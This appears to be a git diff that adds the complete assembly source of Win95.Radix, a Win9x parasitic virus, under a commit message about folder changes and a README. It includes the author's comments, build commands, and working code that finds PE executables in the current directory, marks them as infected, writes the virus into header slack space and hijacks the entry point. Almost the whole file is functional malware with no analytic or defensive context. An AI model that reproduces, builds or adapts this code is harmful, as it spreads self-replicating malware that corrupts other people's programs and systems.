Folder structure change, added README
@@ -0,0 +1,238 @@
|
||||
; Win95.Radix by Radix16[MIONS]
|
||||
; Made in Czech republic
|
||||
;
|
||||
;Hi,
|
||||
;
|
||||
;It's my first Ring3 virus for Win9x.Virus not testing WinNT system.
|
||||
;
|
||||
;Target : PE filez
|
||||
;Virus size : 405(402)
|
||||
;Resident : NO
|
||||
;Polymorhic : NO
|
||||
;
|
||||
;Virus not dangerous, but .....
|
||||
;
|
||||
;Decription AVP:
|
||||
;
|
||||
;http://www.avp.ch/avpve/newexe/win95/radix.stm
|
||||
;
|
||||
;It is a harmless nonmemory resident parasitic Win9x virus. It searches
|
||||
;for PE EXE files in the current directory, then writes itself to the
|
||||
;middle of the file, to not used space at the end of the PE header.
|
||||
;
|
||||
;The virus does not manifest itself in any way. It contains the text:
|
||||
;
|
||||
; Radix16
|
||||
|
||||
;Greets to :
|
||||
; Worf[MIONS]
|
||||
; VirusBuster/29
|
||||
; Prizzy/29A
|
||||
;
|
||||
;
|
||||
;How to build:
|
||||
; tasm32 -ml -m5 radix.asm
|
||||
; tlink32 -Tpe -aa -c -x radix.obj,,, import32
|
||||
; pewrsec radix.exe
|
||||
;
|
||||
;Contacty mee : Radix16@atlas.cz
|
||||
; Radix16.cjb.net
|
||||
|
||||
.386p
|
||||
locals
|
||||
.Model Flat,STDCALL
|
||||
|
||||
extrn ExitProcess :proc
|
||||
extrn GetModuleHandleA : proc
|
||||
|
||||
|
||||
.Data
|
||||
db ?
|
||||
|
||||
.Code
|
||||
|
||||
vStart label byte
|
||||
Start:
|
||||
|
||||
db 68h
|
||||
;Save old eip
|
||||
oldip: dd offset exit
|
||||
pushad
|
||||
Call Next
|
||||
id db 'Radix16'
|
||||
Next:
|
||||
pop ebp
|
||||
|
||||
|
||||
mov esi,KERNEL32+3ch
|
||||
lodsd
|
||||
add eax,KERNEL32
|
||||
xchg eax,esi
|
||||
mov esi,dword ptr [esi+78h]
|
||||
lea esi,dword ptr [esi+1ch+KERNEL32]
|
||||
lodsd
|
||||
mov eax,dword ptr [eax+KERNEL32]
|
||||
add eax,KERNEL32
|
||||
|
||||
push eax
|
||||
push 20060000h
|
||||
push 0h
|
||||
push 1h
|
||||
db 68h
|
||||
currPage:
|
||||
dd FSTGENPAGE
|
||||
push 1000dh
|
||||
call eax
|
||||
pop dword ptr [_VxDCALL0+ebp-X]
|
||||
inc eax
|
||||
jz _exit
|
||||
inc eax
|
||||
;allocation memory
|
||||
push 00020000h or 00040000h
|
||||
push 2h
|
||||
push 80060000h
|
||||
push 00010000h
|
||||
call dword ptr [_VxDCALL0+ebp-X]
|
||||
|
||||
|
||||
mov dword ptr [memory+ebp-X],eax
|
||||
|
||||
push 00020000h or 00040000h or 80000000h or 8h
|
||||
push 0h
|
||||
push 1h
|
||||
push 2h
|
||||
shr eax,12
|
||||
push eax
|
||||
push 00010001h
|
||||
call dword ptr [_VxDCALL0+ebp-X]
|
||||
;Create DTA
|
||||
mov ah,1ah
|
||||
mov edx,dword ptr [memory+ebp-X] ;buffer
|
||||
add edx,1000h
|
||||
call int21
|
||||
|
||||
mov ah,4eh ;FindFirstFile
|
||||
lea edx,[_exe+ebp-X] ;What search
|
||||
xor ecx,ecx ;normal attributes
|
||||
|
||||
tryanother:
|
||||
call int21
|
||||
jc _exit ;is filez ?
|
||||
|
||||
call _infect
|
||||
|
||||
mov ah,4fh ;FindNextFile
|
||||
Jmp tryanother
|
||||
|
||||
_exit:
|
||||
popad
|
||||
ret
|
||||
|
||||
_exe db '*.*',0 ;filez search
|
||||
|
||||
int21:
|
||||
;VxDCALL services
|
||||
push ecx
|
||||
push eax
|
||||
push 002a0010h
|
||||
call dword ptr [_VxDCALL0+ebp-X]
|
||||
ret
|
||||
|
||||
FP: ;Set file pointer
|
||||
mov ah,42h
|
||||
cdq ;xor dx,dx
|
||||
xor cx,cx
|
||||
call int21
|
||||
ret
|
||||
|
||||
|
||||
_infect:
|
||||
|
||||
|
||||
mov edx,dword ptr [memory+ebp-X] ;Name file
|
||||
add edx,101eh
|
||||
|
||||
mov ax,3d02h ;Open File R/W
|
||||
call int21
|
||||
jc quit ;Error ?
|
||||
|
||||
xchg eax,ebx ;FileHandle
|
||||
|
||||
mov ah,3fh ;Read File
|
||||
mov ecx,1000h ;Read 1000h bytes
|
||||
mov edx,dword ptr [memory+ebp-X]
|
||||
call int21
|
||||
jc quitz ;Error ?
|
||||
|
||||
|
||||
mov edi,edx
|
||||
cmp word ptr [edi],'ZM' ;Test Header (EXE)
|
||||
jne quitz ;yes or no ?
|
||||
cmp word ptr [edi+32h],'61' ;Test infection
|
||||
je quitz ;Yes, virus is in file ?
|
||||
mov word ptr [edi+32h],'61' ;No ,Save ID to file
|
||||
add edi,dword ptr [edi+3ch] ;Testing Portable Executable(PE)
|
||||
cmp word ptr [edi],'EP'
|
||||
jne quitz
|
||||
|
||||
|
||||
mov esi,edi
|
||||
mov eax,18h ;Shift image header
|
||||
add ax,word ptr [edi+14h]
|
||||
add edi,eax
|
||||
|
||||
;Search end section
|
||||
movzx cx,word ptr [esi+06h]
|
||||
mov ax,28h
|
||||
mul cx
|
||||
add edi,eax
|
||||
|
||||
mov ecx,dword ptr [esi+2ch]
|
||||
mov dword ptr [esi+54h],ecx
|
||||
|
||||
push edi
|
||||
sub edi,dword ptr [memory+ebp-X]
|
||||
xchg edi,dword ptr [esi+28h]
|
||||
mov eax,dword ptr [esi+34h]
|
||||
add edi,eax
|
||||
shr eax,12
|
||||
mov dword ptr [currPage+ebp-X],eax
|
||||
mov dword ptr [oldip+ebp-X],edi ;Save old EIP
|
||||
pop edi
|
||||
|
||||
|
||||
mov ecx,VirusSize
|
||||
lea esi,[vStart+ebp-X]
|
||||
rep movsb ;CopyVirus
|
||||
|
||||
xor al,al ;SetFilePointer 0=beginning file
|
||||
call FP ;mov al,0
|
||||
|
||||
mov ah,40h ;Write to file
|
||||
mov ecx,1000h
|
||||
mov edx,dword ptr [memory+ebp-X]
|
||||
call int21
|
||||
|
||||
quitz:
|
||||
mov ah,3eh ;CloseFile
|
||||
call int21
|
||||
|
||||
quit:
|
||||
|
||||
ret
|
||||
|
||||
exit:
|
||||
|
||||
vEnd label byte
|
||||
ret
|
||||
VirusSize equ vEnd-vStart
|
||||
KERNEL32 equ 0bff70000h ;Win9X kernel address
|
||||
FSTGENPAGE equ 000400000h/1000h
|
||||
X equ offset id
|
||||
_VxDCALL0 dd ?
|
||||
memory dd ? ;Buffer
|
||||
|
||||
Virual_End:
|
||||
|
||||
ends
|
||||
End Start
|
||||